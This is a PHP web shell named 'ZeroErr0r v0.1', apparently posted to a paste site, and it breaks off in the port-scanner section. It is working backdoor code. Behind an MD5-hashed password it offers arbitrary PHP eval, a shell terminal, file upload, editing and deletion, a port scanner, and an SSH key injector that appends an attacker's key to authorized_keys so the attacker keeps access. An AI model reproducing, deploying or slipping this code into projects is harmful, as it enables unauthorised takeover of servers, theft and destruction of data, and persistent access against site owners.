· 6 years ago · May 29, 2019, 08:31 AM
1<?php
2session_start();
3error_reporting(0);
4
5$password = "bf211b896d1233e0b9fc5acb604b0329"; // md5 hashed
6
7
8if (isset($_POST['password'])) {
9 if (md5($_POST['password']) == $password) {
10 $_SESSION['password'] = $_POST['password'];
11 header("Location: ?");
12 } else {
13 header("Location: ?");
14 }
15}
16
17// ssh key injector
18if (isset($_POST['inject_key'])) {
19 $key = $_POST['pub_key'];
20
21 // TODO: make this method works on windows servers
22 // this is only for linux server
23 chdir($_SERVER['DOCUMENT_ROOT'] . "/..");
24 if (file_exists(getcwd() . "/.ssh")) {
25 if (!is_writable((getcwd() . '/.ssh'))) {
26 header("Location: ?view=injector&action=ssh&msg=" . base64_encode("permission denied"));
27 die();
28 }
29 } else {
30 if (!is_writable(getcwd())) {
31 header("Location: ?view=injector&action=ssh&msg=" . base64_encode("permission denied"));
32 die();
33 }
34 mkdir(getcwd() . "/.ssh");
35 }
36
37 $key_file = fopen(getcwd() . "/.ssh/authorized_keys", "a+");
38 fwrite($key_file, $key);
39 fclose($key_file);
40 chdir($_SESSION['cd']);
41 header("Location: ?view=injector&action=ssh&msg=" . base64_encode("ssh key injected successfully!"));
42}
43
44function download($filename){
45 if(!empty($filename)){
46 // Specify file path.
47 $path = ''; // '/uplods/'
48 $download_file = $path.$filename;
49 // Check file is exists on given path.
50 if(file_exists($download_file)) {
51 // Getting file extension.
52 $extension = explode('.',$filename);
53 $extension = $extension[count($extension)-1];
54 // For Gecko browsers
55 header('Content-Transfer-Encoding: binary');
56 header('Last-Modified: ' . gmdate('D, d M Y H:i:s', filemtime($path)) . ' GMT');
57 // Supports for download resume
58 header('Accept-Ranges: bytes');
59 // Calculate File size
60 header('Content-Length: ' . filesize($download_file));
61 header('Content-Encoding: none');
62 // Change the mime type if the file is not PDF
63 header('Content-Type: application/'.$extension);
64 // Make the browser display the Save As dialog
65 header('Content-Disposition: attachment; filename=' . $filename);
66 readfile($download_file);
67 exit;
68 }
69 else {
70 header("Location: ?msg=" . base64_encode('File does not exists on given path'));
71 }
72
73 }
74}
75
76if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'download') {
77 download($_GET['view']);
78}
79
80if (isset($_GET['action']) AND $_GET['action'] == 'logout') {
81 session_destroy();
82 header("Location: ?");
83 die();
84}
85
86
87function delete_directory($dirname) {
88 if (is_dir($dirname))
89 $dir_handle = opendir($dirname);
90 if (!$dir_handle)
91 return false;
92 while($file = readdir($dir_handle)) {
93 if ($file != "." && $file != "..") {
94 if (!is_dir($dirname."/".$file))
95 unlink($dirname."/".$file);
96 else
97 delete_directory($dirname.'/'.$file);
98 }
99 }
100 closedir($dir_handle);
101 rmdir($dirname);
102 return true;
103}
104
105if (isset($_GET['cd'])) {
106 $_SESSION['cd'] = base64_decode($_GET['cd']);
107}
108
109if (isset($_GET['rmdir'])) {
110 $file = realpath(base64_decode($_GET['rmdir']));
111 if (file_exists($file)) {
112 if (is_writable($file)) {
113 delete_directory($file);
114 header("Location: ?msg=" . base64_encode($file . " has been deleted!"));
115 } else {
116 header("Location: ?msg=" . base64_encode("permission denied!"));
117 }
118 }
119}
120if (isset($_GET['rmfile'])) {
121 $file = realpath(base64_decode($_GET['rmfile']));
122 if (file_exists($file)) {
123 if (is_writable($file)) {
124 unlink($file);
125 header("Location: ?msg=" . base64_encode($file . " has been deleted!"));
126 } else {
127 header("Location: ?msg=" . base64_encode("permission denied!"));
128 }
129 }
130}
131
132if (isset($_GET['multirmfile'])) {
133 for ($i = 0; $i < intval($_GET['multirmfile']); $i++) {
134 $file = realpath(base64_decode($_GET['rmfile' . $i]));
135 if (file_exists($file)) {
136 if (is_writable($file)) {
137 if (is_dir($file)) {
138 rmdir($file);
139 } else {
140 unlink($file);
141 }
142 header("Location: ?msg=" . base64_encode("selected file(s) has been deleted!"));
143 } else {
144 header("Location: ?msg=" . base64_encode("permission denied!"));
145 }
146 }
147 }
148}
149
150if (isset($_SESSION['cd'])) {
151 chdir($_SESSION['cd']);
152}
153
154if (isset($_GET['to']) AND isset($_GET['from'])) {
155 $from = base64_decode($_GET['from']);
156 $to = $_GET['to'];
157
158 if (is_writable($from)) {
159 if (file_exists($from)) {
160 rename($from, getcwd() . '/' . $to);
161 header('Location: ?msg=' . base64_encode("file renamed successfully!"));
162 } else {
163 header("Location: ?msg=" . base64_encode("file doesn't exist"));
164 }
165 } else {
166 header("Location: ?msg=" . base64_encode("permission denied!"));
167 }
168}
169
170function formatSizeUnits($bytes) {
171 if ($bytes >= 1073741824) { $bytes = number_format($bytes / 1073741824, 2) . ' GB'; }
172 elseif ($bytes >= 1048576) { $bytes = number_format($bytes / 1048576, 2) . ' MB'; }
173 elseif ($bytes >= 1024) { $bytes = number_format($bytes / 1024, 2) . ' KB'; }
174 elseif ($bytes > 1) { $bytes = $bytes . ' B'; }
175 elseif ($bytes == 1) { $bytes = $bytes . ' B'; }
176 else { $bytes = '0 B'; }
177
178 return $bytes;
179}
180function formatPerms($perms) {
181 switch ($perms & 0xF000) {
182 case 0xC000: // socket
183 $info = 's';
184 break;
185 case 0xA000: // symbolic link
186 $info = 'l';
187 break;
188 case 0x8000: // regular
189 $info = 'r';
190 break;
191 case 0x6000: // block special
192 $info = 'b';
193 break;
194 case 0x4000: // directory
195 $info = 'd';
196 break;
197 case 0x2000: // character special
198 $info = 'c';
199 break;
200 case 0x1000: // FIFO pipe
201 $info = 'p';
202 break;
203 default: // unknown
204 $info = 'u';
205 }
206
207 // Owner
208 $info .= (($perms & 0x0100) ? 'r' : '-');
209 $info .= (($perms & 0x0080) ? 'w' : '-');
210 $info .= (($perms & 0x0040) ?
211 (($perms & 0x0800) ? 's' : 'x' ) :
212 (($perms & 0x0800) ? 'S' : '-'));
213
214 // Group
215 $info .= (($perms & 0x0020) ? 'r' : '-');
216 $info .= (($perms & 0x0010) ? 'w' : '-');
217 $info .= (($perms & 0x0008) ?
218 (($perms & 0x0400) ? 's' : 'x' ) :
219 (($perms & 0x0400) ? 'S' : '-'));
220
221 // World
222 $info .= (($perms & 0x0004) ? 'r' : '-');
223 $info .= (($perms & 0x0002) ? 'w' : '-');
224 $info .= (($perms & 0x0001) ?
225 (($perms & 0x0200) ? 't' : 'x' ) :
226 (($perms & 0x0200) ? 'T' : '-'));
227
228 return $info;
229}
230function modifiedDate($filename) {
231 if (file_exists($filename)) {
232 return date ("M-d-Y H:i:s", filemtime($filename));
233 }
234}
235
236function ex($in) {
237 $out = '';
238 if(function_exists('exec')) {
239 @exec($in,$out);
240 $out = @join("\n",$out);
241 }elseif(function_exists('passthru')) {
242 ob_start();
243 @passthru($in);
244 $out = ob_get_clean();
245 }elseif(function_exists('system')) {
246 ob_start();
247 @system($in);
248 $out = ob_get_clean();
249 }elseif(function_exists('shell_exec')) {
250 $out = shell_exec($in);
251 }elseif(is_resource($f = @popen($in,"r"))) {
252 $out = "";
253 while(!@feof($f))
254 $out .= fread($f,1024);
255 pclose($f);
256 }
257 return $out;
258}
259
260function which($p) {
261 $path = ex('which '.$p);
262 if(!empty($path))
263 return $path;
264 return false;
265}
266
267if (isset($_POST['edit'])) {
268 if (is_writable($_POST['dest'])) {
269 $file = fopen($_POST['dest'], 'w');
270 fwrite($file, $_POST['content']);
271 fclose($file);
272 header('Location: ?msg=' . base64_encode("file saved!"));
273 } else {
274 header('Location: ?msg=' . base64_encode("permission denied!"));
275 }
276}
277
278if (isset($_GET['touch']) AND isset($_GET['file'])) {
279 if (is_writable(dirname(base64_decode($_GET['touch'])))) {
280 $content = "";
281 $fp = fopen(base64_decode($_GET['touch']) . '/' . $_GET['file'],"wb");
282 fwrite($fp,$content);
283 fclose($fp);
284 header("Location: ?msg=" . base64_encode($_GET['file'] . " has been created!"));
285 } else {
286 header("Location: ?msg=" . base64_encode("permission denied!"));
287 }
288}
289
290if (isset($_GET['mkdir_path']) AND isset($_GET['folder'])) {
291 if (is_writable(dirname(base64_decode($_GET['mkdir_path'])))) {
292 mkdir(base64_decode($_GET['mkdir_path']) . '/' . $_GET['folder']);
293 header("Location: ?msg=" . base64_encode($_GET['folder'] . " folder has been created!"));
294 } else {
295 header("Location: ?msg=" . base64_encode("permission denied!"));
296 }
297}
298
299if (isset($_POST['upload'])) {
300 if (is_writable($_POST['path'])) {
301 $files = @$_FILES["files"];
302 $fullpath = $_POST['path'] . "/" . $files["name"];
303
304 // if (file_exists($fullpath)) {
305 // header("Location: ?msg=" . base64_encode("file already exist!"));
306 // die();
307 // }
308
309 if ($files["name"] != '') {
310 if (move_uploaded_file($files['tmp_name'], $fullpath)) {
311 header("Location: ?msg=" . base64_encode("file uploaded to $fullpath"));
312 } else {
313 header("Location: ?msg=" . base64_encode("an error occured!"));
314 }
315 }
316 } else {
317 header("Location: ?msg=" . base64_encode(base64_decode('permission denied!')));
318 }
319}
320
321if ($_SERVER['REQUEST_METHOD'] == 'POST' AND isset($_POST['qpath'])) {
322 header("Location: ?cd=" . base64_encode($_POST['qpath']));
323}
324
325
326
327if (isset($_GET['action']) AND isset($_GET['numfiles']) AND $_GET['action'] == 'zip') {
328 $zip = new ZipArchive();
329 chdir($_SESSION['cd']);
330 if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
331 $tmp = explode('\\', getcwd());
332 } else {
333 $tmp = explode('/', getcwd());
334 }
335
336 if($zip->open(getcwd() . "/" . $tmp[count($tmp) - 1] . ".zip", ZipArchive::CREATE) === TRUE) {
337 for ($i = 0; $i < intval($_GET['numfiles']); $i++) {
338 // $zip->addFromString(basename(getcwd() . '/cx.txt'), file_get_contents(getcwd() . '/cx.txt'));
339 $file = base64_decode($_GET['file' . $i]);
340 if (!is_dir($file)) {
341 $zip->addFile(basename($file));
342 }
343 }
344 $zip->close();
345
346 header("Location: ?msg=" . base64_encode("selected files has been compressed and downloaded."));
347 } else {
348 echo "Failed!";
349 header("Location: ?msg=" . base64_encode("failed to create a zip file"));
350 }
351}
352
353?>
354
355<!DOCTYPE html>
356<html>
357<head>
358 <meta charset="utf-8">
359 <title>- ZerroErr0r v0.1</title>
360 <link rel="stylesheet" type="text/css" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css">
361 <style type="text/css">
362 .hljs{display:block;overflow-x:auto;padding:.5em;background:#071414;color:#e6e1dc}.hljs-comment,.hljs-quote{color:#bc9458;font-style:italic}.hljs-keyword,.hljs-selector-tag{color:#c26230}.hljs-number,.hljs-regexp,.hljs-string,.hljs-template-variable,.hljs-variable{color:#a5c261}.hljs-subst{color:#519f50}.hljs-name,.hljs-tag{color:#e8bf6a}.hljs-type{color:#da4939}.hljs-attr,.hljs-built_in,.hljs-builtin-name,.hljs-bullet,.hljs-link,.hljs-symbol{color:#6d9cbe}.hljs-params{color:#d0d0ff}.hljs-attribute{color:#cda869}.hljs-meta{color:#9b859d}.hljs-section,.hljs-title{color:#ffc66d}.hljs-addition,.hljs-deletion{color:#e6e1dc;display:inline-block;width:100%}.hljs-addition{background-color:#144212}.hljs-deletion{background-color:#600}.hljs-selector-class{color:#9b703f}.hljs-selector-id{color:#8b98ab}.hljs-emphasis{font-style:italic}.hljs-strong{font-weight:700}.hljs-link{text-decoration:underline}
363 </style>
364
365 <script type="text/javascript">
366 window.addEventListener('load', function() {
367 var boxes = document.getElementsByClassName('box');
368 for (var i = 0; i < boxes.length; i++) {
369 boxes[i].innerHTML += "<span class='c1'></span><span class='c2'></span><span class='c3'></span><span class='c4'></span>";
370 }
371 }, false);
372 </script>
373
374 <style type="text/css">
375 @import url(https://fonts.googleapis.com/css?family=Electrolize);body,h1,h2,h3,h4,h5,nav ul{margin:0;padding:0}nav li a,nav li a:hover{transition:all .2s ease}nav li a,section a{text-decoration:none}nav li,nav li a{display:inline-block}.logo span,body,form textarea,section a:hover{color:#AAA}.error,footer{text-align:right}body{background-color:#071414;font-family:Electrolize,monospace,sans-serif,arial}header{padding:20px;border:1px solid #BBB;margin:20px}header .logo{float:left;position:relative;top:3px}header .info{float:right;text-transform:uppercase}.logo span{opacity:.7}nav{padding:0 20px;}nav li a{padding:4px 15px;color:#E3052B;}nav li a:hover{text-decoration: line-through;}section{margin:20px;border:1px solid #E3052B;}section .content{padding:20px}section .title{background-color:#0E1A1F;padding:10px 20px;border-bottom:1px solid #85001A}section table{width:100%}section table td{padding:5px 15px}section table .td_head td{padding:0 15px 20px;text-transform:uppercase}section table tr:hover{background-color:#1A272E}section table tr:first-child:hover{background-color:transparent}section a{color:#EF330E}.error{padding:10px 20px;background-color:#E3052B; text-align:center;color:#EEE;}img{max-width:100%}pre{overflow:auto}pre code{font-size:1rem}form textarea{width:100%;display:block;border:none;height:500px;background-color:transparent;resize:none;font-size:1.2rem;outline:0}form input[type=submit],form select{padding:5px 20px;font-family: 'Electrolize', monospace;border:1px solid #E3052B;display:inline-block;margin-top:20px;font-size:1rem;background-color:transparent;color:#E3052B;cursor:pointer;outline:none;}form select{background-color:#071414;outline:0}form input[type=submit]:hover{background-color:#85001A;color:#AAA}form input[type=text]{border:none;background-color:transparent;font-size:1.1rem;width:80%;outline:0;color:#EF330E;font-family:monospace}.light_red{color:#E3052B}.dark_red{color:#85001A}.orange{color:#EF330E}.light_black{color:#0E1A1F}.dark_black{color:#071414}.clearfix:after{content:'';display:table;clear:both}::-webkit-scrollbar{width:8px}::-webkit-scrollbar-track{-webkit-box-shadow:inset 0 0 6px rgba(0,0,0,.3);border-radius:10px}::-webkit-scrollbar-thumb{background-color:#85001a}footer{padding:20px;opacity:.2}.result{margin-top:20px;padding:10px;background-color:#1A272E}#login input{background-color:transparent;border:1px solid #E3052B;width:100%;box-sizing:border-box;padding:10px 20px;display:block;margin-top:5px;color:#E3052B;outline:0}#login{width:300px;}#login input[type=submit]{margin-top:15px}#login input[type=submit]:hover{background-color:#85001A;color:#AAA}form .title{border: none;width: 100%;color:#AAA;font-size: 1.1rem;font-family: 'Electrolize', monospace; box-sizing: border-box;border-bottom: 1px solid #E3052B; outline: none;}.box { border: 2px solid #85001A; }.box .c1, .box .c2, .box .c3, .box .c4 { display: block; position: absolute; width: 5px; height: 3px; background-color: #EEE; }.box .c1 { top: -2px; left: -2px; }.box .c2 { top: -2px; right: -2px; }.box .c3 { bottom: -2px; right: -2px; }.box .c4 { bottom: -2px; left: -2px; }header { position: relative; }header .logo p, header .logo{font-weight: lighter;padding: 0;margin: 0;top:0;}section{position: relative;}#login p{margin: 0;}#login{position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%);}#login .content{padding: 20px;}#login .title{padding: 10px 20px;border-color: #85001A;border-width: 2px;}#login .content input {border-color: #85001A;}select {font-family: 'Electrolize', monospace;padding: 0 20px;}pre {white-space: pre-wrap;white-space: -moz-pre-wrap;white-space: -pre-wrap;white-space: -o-pre-wrap;word-wrap: break-word;}.view_action, .action_menu{padding: 10px 20px;border-bottom:2px solid #85001A;position: relative;}.view_action button, .action_menu button{outline:none;border: 1px solid #E3052B;background-color: transparent;color: #E3052B;padding: 5px 15px;display: inline-block;cursor: pointer;font-family: 'Electrolize', monospace;}.view_action button:hover, .action_menu button:hover{background-color: #85001A;color: #EEE;}.file_select{opacity: 0;}tr:hover .file_select{opacity: 1;}.file_select{margin: 0;padding: 0;cursor: pointer;outline: none;}.action_menu{display: none;}.info_head{padding: 10px 20px;background-color: #85001A;cursor: pointer;margin: 5px 0 0 0;}.server_info table { border:1px solid #85001A;}.server_info table td { border: 0.1px solid #333; }.server_info table tr:hover {background-color: transparent;}.off{display: none;}.port_scanner input[type='text']{display: inline-block; padding: 10px;border:1px solid #E3052B;width: 100%;box-sizing: border-box;}.port_scanner tr:hover{background-color: transparent;}.port_scanner td {padding: 3px 0;}
376 </style>
377
378 <script src="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.10.0/highlight.min.js"></script>
379</head>
380<body>
381<?php if (!isset($_SESSION['password'])) { ?>
382
383<form action="" method="post" id="login" class="box">
384 <p class="title">PASSWORD</p><br>
385 <div class="content">
386 <input type="text" name="password" style="-webkit-text-security: square;font-size: 1.3rem; text-align: center;padding: 5px;-webkit-text-security: square;letter-spacing: 3px;padding-bottom: 8px;font-family: 'Electrolize', monospace;" autocomplete="off" spellcheck="false" autofocus>
387 <input type="submit" name="login" value="GET IN!" style="font-family: 'Electrolize', monospace;font-size: 1rem;">
388 </div>
389</form>
390
391<?php die(); } ?>
392
393
394<header class="clearfix box">
395 <div class="logo">
396 <p>ZeroErr0r <span>v0.1</span></p>
397 </div>
398 <div class="info">
399 Server IP: <?php echo gethostbyname($_SERVER['SERVER_NAME']) ?>
400 </div>
401</header>
402<nav>
403 <ul>
404 <li><a href="?">explorer</a></li>
405 <li><a href="?view=evaluate">evaluate</a></li>
406 <li><a href="?view=info">info</a></li>
407 <li><a href="?view=terminal">terminal</a></li>
408 <li><a href="?view=port_scanner">port scanner</a></li>
409 <li><a href="?view=injector">injector</a></li>
410 <li><a href="?view=database">database</a></li>
411 <li><a href="?view=networking">networking</a></li>
412 <li><a href="?action=logout"><i class="fa fa-sign-out"></i> logout</a></li>
413 </ul>
414</nav>
415<section class="box">
416 <?php if (isset($_GET['msg'])) { ?>
417 <div class="error"><?php echo base64_decode($_GET['msg']) ?></div>
418 <?php } ?>
419
420 <script>
421 function showAction() {
422 var s = document.getElementsByClassName('file_select');
423 var m = document.getElementsByClassName('action_menu')[0];
424 for (var i = 0; i < s.length; i++) {
425 if (s[i].checked) {
426 m.style.display = 'block';
427 break;
428 } else {
429 m.style.display = 'none';
430 }
431 }
432 }
433 </script>
434
435 <div class="action_menu">
436 <button onclick="filesDelete()"><i class="fa fa-trash"></i> Delete</button>
437 <button onclick="filesCompress()"><i class="fa fa-download"></i> Compress</button>
438 </div>
439
440 <!-- SUB_MENU -->
441 <?php if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?>
442 <div class="view_action">
443 <a href="?view=<?php echo $_GET['view'] ?>&action=edit"><button><i class="fa fa-pencil"></i> Edit</button></a>
444 <a href="?view=<?php echo $_GET['view'] ?>&action=download"><button><i class="fa fa-download"></i> Download</button></a>
445 <a href="?rmfile=<?php echo base64_encode($_GET['view']) ?>"><button><i class="fa fa-trash"></i> Delete</button></a>
446 <a href="?"><button><i class="fa fa-close"></i> Close</button></a>
447 </div>
448 <?php } ?>
449 <?php if (isset($_GET['view']) AND $_GET['view'] == 'injector') { ?>
450 <div class="view_action">
451 <a href="?view=<?php echo $_GET['view'] ?>"><button><i class="fa fa-asterisk"></i> Basic Injector</button></a>
452 <a href="?view=<?php echo $_GET['view'] ?>&action=ssh"><button><i class="fa fa-exchange"></i> SSH Injector</button></a>
453 </div>
454 <?php } ?>
455
456 <form action="" method="POST">
457 <input class="title" value="<?php echo getcwd(); ?>" name="qpath" spellcheck="false" autocomplete="off" style="border-color: #85001A;border-width: 2px;">
458 </form>
459 <div class="content">
460 <?php if (!isset($_GET['view'])) { ?>
461 <table>
462 <tr class="td_head">
463 <td>name</td>
464 <td>size</td>
465 <td>permissions</td>
466 <td>modified</td>
467 <td>action</td>
468 </tr>
469 <?php
470 // echo getcwd() . "<br>";
471 // chdir("..");
472 // echo getcwd();
473 $directories = array();
474 $files_list = array();
475 if ($handle = opendir('.')) {
476
477 while (false !== ($entry = readdir($handle))) {
478
479 if (is_dir($entry)) {
480 $directories[] = $entry;
481 } else {
482 $files_list[] = $entry;
483 }
484 }
485
486 closedir($handle);
487 }
488 asort($directories);
489
490 foreach ($directories as $dir) {
491 if ($dir != "." && $dir != "..") {
492 $size = "Dir";
493 $perms = formatPerms(fileperms($dir));
494 $modified = modifiedDate($dir);
495 $link = "?cd=" . base64_encode(getcwd() . "/" . $dir);
496 $del = "?rmdir=" . base64_encode(getcwd() . "/" . $dir);
497 $down_path = getcwd() . "/" . $dir;
498 $path = base64_encode($down_path);
499 // $upload_path = realpath(dirname(__FILE__) . $dir);
500
501 echo "<tr>";
502 echo "<td><input type='checkbox' class='file_select' onclick='fileSelectCheck()' value='$path'> <a href='$link'><i class='fa fa-folder'></i> $dir</a></td>";
503 echo "<td>$size</td>";
504 echo "<td>$perms</td>";
505 echo "<td>$modified</td>";
506 echo "<td class='action'><a href='#' onclick='rename(\"$path\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$down_path&action=upload'>upl</a></td>";
507 echo "</tr>";
508 } else {
509 $size = "Link";
510 $perms = formatPerms(fileperms($dir));
511 $modified = modifiedDate($dir);
512 $down_path = getcwd() . "/" . $dir;
513 if ($dir == '..'){
514 $link = "?cd=" . base64_encode(getcwd() . "/..");
515 $touch_path = base64_encode('..');
516 $mkdir_path = base64_encode('..');
517 $upload_dir = '..';
518 } else {
519 $link = "?cd=" . base64_encode(getcwd());
520 $touch_path = base64_encode($down_path);
521 $mkdir_path = base64_encode($down_path);
522 $upload_dir = getcwd();
523 }
524
525 echo "<tr>";
526 echo "<td><input type='checkbox' style='opacity:0;margin: 0;padding: 0;' disabled> <a href='$link'><i class='fa fa-folder'></i> $dir</a></td>";
527 echo "<td>$size</td>";
528 echo "<td>$perms</td>";
529 echo "<td>$modified</td>";
530 echo "<td class='action'><a href='?view=$upload_dir&action=upload'>upl</a> - <a href='#' onclick='touch(\"$touch_path\")'>+file</a> - <a href='#' onclick='mkdir(\"$mkdir_path\")'>+dir</a></td>";
531 echo "</tr>";
532 }
533 }
534
535 foreach ($files_list as $file) {
536 // if ($file != "." && $file != "..") {
537 $size = formatSizeUnits(filesize($file));
538 $perms = formatPerms(fileperms($file));
539 $modified = modifiedDate($file);
540 $del = "?rmfile=" . base64_encode(getcwd() . "/" . $file);
541 // $down_path = realpath(getcwd() . "/" . $file);
542 $path = getcwd() . "/" . $file;
543 $rename_path = base64_encode($down_path);
544 $isimg = @is_array(getimagesize($file));
545
546 // echo "<p>$file <b>" . formatSizeUnits(filesize($file)) . "</b></p>";
547 echo "<tr>";
548 echo "<td><input type='checkbox' class='file_select' onclick='fileSelectCheck()' value='$rename_path'> <a href='?view=$path&action=display&img=$isimg'><i class='fa fa-file-text'></i> $file</a></td>";
549 echo "<td>$size</td>";
550 echo "<td>$perms</td>";
551 echo "<td>$modified</td>";
552 echo "<td class='action'><a href='?view=$path&action=edit'>edit</a> - <a href='#' onclick='rename(\"$rename_path\", \"$file\")'>ren</a> - <a href='$del'>del</a> - <a href='?view=$path&action=download'>dl</a></td>";
553 echo "</tr>";
554 // }
555 }
556
557 ?>
558 </table>
559 <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND isset($_GET['img']) AND $_GET['action'] == 'display') { ?>
560 <?php $path_info = pathinfo($_GET['view']); ?>
561
562 <pre><code class="<?php echo $path_info['extension'] ?>"><?php
563 if (file_exists($_GET['view'])) {
564 if ($_GET['img'] === '1') {
565 $image = (strpos($_GET['view'], $_SERVER['DOCUMENT_ROOT']) !== false) ? preg_replace('#'. $_SERVER['DOCUMENT_ROOT'] .'#', 'http://' . $_SERVER['HTTP_HOST'], $_GET['view']) : $_GET['view'];
566 // Read image path, convert to base64 encoding
567 $imageData = base64_encode(file_get_contents($image));
568
569 // Format the image SRC: data:{mime};base64,{data};
570 $src = 'data: '. pathinfo($image, PATHINFO_EXTENSION) .';base64,'.$imageData;
571
572 // Echo out a sample image
573 echo '<img src="' . $src . '">';
574 } else {
575 $file = fopen($_GET['view'], 'r');
576 if (filesize($_GET['view']) > 0)
577 echo htmlspecialchars(fread($file, filesize($_GET['view'])));
578 else
579 echo "Empty";
580 fclose($file);
581 }
582 }
583 ?></code></pre>
584
585 <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'edit') { ?>
586
587 <?php
588 $file = fopen($_GET['view'], 'r');
589 if (filesize($_GET['view']) > 0)
590 $content = htmlspecialchars(fread($file, filesize($_GET['view'])));
591 else
592 $content = "";
593 fclose($file);
594 ?>
595
596 <form action="" method="post">
597 <textarea name="content" spellcheck="false" autofocus><?php echo $content ?></textarea>
598 <input type="hidden" name="dest" value="<?php echo $_GET['view'] ?>">
599 <input type="submit" name="edit" value="Save!">
600 </form>
601
602 <?php } else if (isset($_GET['view']) AND isset($_GET['action']) AND $_GET['action'] == 'upload') { ?>
603
604 <form action="" method="post" enctype="multipart/form-data" style="border: 1px solid #AAA; padding: 20px;">
605 <p style="margin: 0;font-size: 1.2rem;">Local File Upload</p>
606 <input type="hidden" name="path" value="<?php echo $_GET['view'] ?>">
607 <input type="file" name="files">
608 <input type="submit" name="upload" value="Upload!">
609 </form>
610 <br><br>
611 <form action="" method="post" enctype="multipart/form-data" style="border: 1px solid #AAA; padding: 20px;">
612 <p style="margin: 0;font-size: 1.2rem;">Remote File Upload</p>
613 <input type="hidden" name="path" value="<?php echo $_GET['view'] ?>">
614 <input type="text" name="remote_file" placeholder="Remote File URL" style="border: 1px solid #EF330E; padding: 6px 20px; position: relative;top:-1px; width: 200px;">
615 <input type="submit" name="remote_upload" value="Upload!">
616 </form>
617
618 <!-- EVALUATE -->
619 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'evaluate') { ?>
620 <form action="?view=evaluate" method="post">
621 <textarea name="eval_code" spellcheck="false" style="height: 200px;" autofocus><?php if (isset($_POST['eval_code'])) { echo $_POST['eval_code']; } ?></textarea>
622 <input type="submit" name="eval" value="Go!">
623 <select name="language">
624 <option value="php">php</option>
625 <!-- <option value="python">python</option>
626 <option value="perl">perl</option>
627 <option value="nodejs">nodejs</option>
628 <option value="ruby">ruby</option> -->
629 </select>
630 </form>
631 <?php
632 if (isset($_POST['eval'])) {
633 $code = $_POST['eval_code'];
634 $lang = $_POST['language'];
635 echo '<pre class="result">';
636 if ($lang == 'php') {
637 eval($code);
638 }
639 echo '</pre>';
640 }
641 ?>
642
643 <!-- INFO -->
644 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'info') { ?>
645 <div class="server_info">
646 <p class="info_head" onclick="toggle(this)">Server Info</p>
647 <table class="off">
648 <tr>
649 <td>Root Disk</td>
650 <td><?php echo (formatSizeUnits(disk_total_space("/") - disk_free_space("/"))) . " / " . formatSizeUnits(disk_total_space("/")); ?></td>
651 </tr>
652 <tr>
653 <td>PHP</td>
654 <td><?php echo phpversion() ?></td>
655 </tr>
656 <tr>
657 <td>Python</td>
658 <td><?php if(which("python")) { echo shell_exec("python --version 2>&1"); } ?></td>
659 </tr>
660 <tr>
661 <td>Curl</td>
662 <td><?php if(function_exists('curl_version')) { $v = curl_version(); echo $v['version']; } ?></td>
663 </tr>
664 <tr>
665 <td>tar</td>
666 <td><?php if(which("tar")) { echo shell_exec("tar --version | grep ^tar | sed 's/^.* //g'"); } ?></td>
667 </tr>
668 <tr>
669 <td>Perl</td>
670 <td><?php if(which("perl")) { echo shell_exec("perl -e 'print $];'"); } ?></td>
671 </tr>
672 <tr>
673 <td>GCC</td>
674 <td><?php if(which("perl")) { echo shell_exec("gcc --version | grep ^gcc | sed 's/^.* //g'"); } ?></td>
675 </tr>
676 </table>
677 <p class="info_head" onclick="toggle(this)">PHP Configuration</p>
678 <table class="off">
679 <?php
680 foreach (parse_ini_file(php_ini_loaded_file()) as $key => $value) {
681 echo "<tr>";
682 echo "<td>" . $key . "</td>";
683 echo "<td>" . $value . "</td>";
684 echo "</tr>";
685 }
686 ?>
687 </table>
688 </div>
689
690 <!-- TERMINAL -->
691 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'terminal') { ?>
692 <pre style="height: 300px;word-wrap: break-word;"><code class="sh"><?php if (isset($_GET['cmd'])) {
693 $cmd = $_GET['cmd'];
694 if (strpos($_GET['cmd'], 'cd') !== false) {
695 $tmp = explode(" ", $_GET['cmd']);
696 $direct = getcwd() . "/" . $tmp[array_search('cd', $tmp) + 1];
697 chdir($direct);
698 $_SESSION['cd'] = $direct;
699 echo "<script>document.location = '?view=terminal';</script>";
700 }
701 $tmp = explode(" ", $_GET['cmd']);
702 if (array_search('edit', $tmp) === 0) {
703 $direct = getcwd() . "/" . $tmp[array_search('edit', $tmp) + 1];
704 echo "<script>document.location = '?view=" . urlencode($direct) . "&action=edit';</script>";
705 }
706 echo htmlentities(ex($cmd . " 2>&1"));
707
708 } ?></code></pre>
709 <br>
710 <form action="?" method="get">
711 <input type="hidden" name="view" value="terminal">
712 <?php echo get_current_user(); ?>:
713 <input id="cmd" type="text" name="cmd" spellcheck="false" autocomplete="off" value="" autofocus placeholder=" shell command -">
714 </form>
715
716 <!-- PORT_SCANNER -->
717 <?php } else if (isset($_GET['view']) AND $_GET['view'] == 'port_scanner') { ?>
718 <form action="" method="post" class="port_scanner">
719 <table>
720 <tr>
721 <td width="10%">Host:</td>
722 <td width="90%"><input type="text" name="host" value="localhost" autocomplete="off" spellcheck="false"></td>
723 </tr>
724 <tr>
725 <td width="10%">Port Start:</td>
726 <td width="90%"><input type="text" name="sport" value="0" autocomplete="off" spellcheck="false"></td>
727 </tr>
728 <tr>
729 <td width="10%">Port End:</td>
730 <td width="90%"><input type="text" name="eport" value="5000" autocomplete="off" spellcheck="false"></td>
731 </tr>
732 </table>
733 <input type="submit" name="scan" value="SCAN!">
734 </form>
735 <?php if (isset($_POST['scan'])) { ?>
736 <div class="result" style="background-color: #071414;padding: 0;padding-top: 20px;">
737 <table>
738 <?php
739 $start = strip_tags($_POST['sport']);
740 $end = strip_tags($_POST['eport']);
741 $host = strip_tags($_POST['host']);
742 for($i = $start; $i<=$end; $i++){
743 $fp = @fsockopen($host, $i, $errno, $errstr, 3);
744 if($fp){
745 if ($i == 22 OR $i == 2222) {
746 echo '<tr><td width="5%" style="background-color: #FFA800;"><font color=white>open</font></td><td width="95%" style="background-color: #1A272E;">Port '.$i.' this could be vulnerable to SSH Injection</td></tr>';
747 } else {
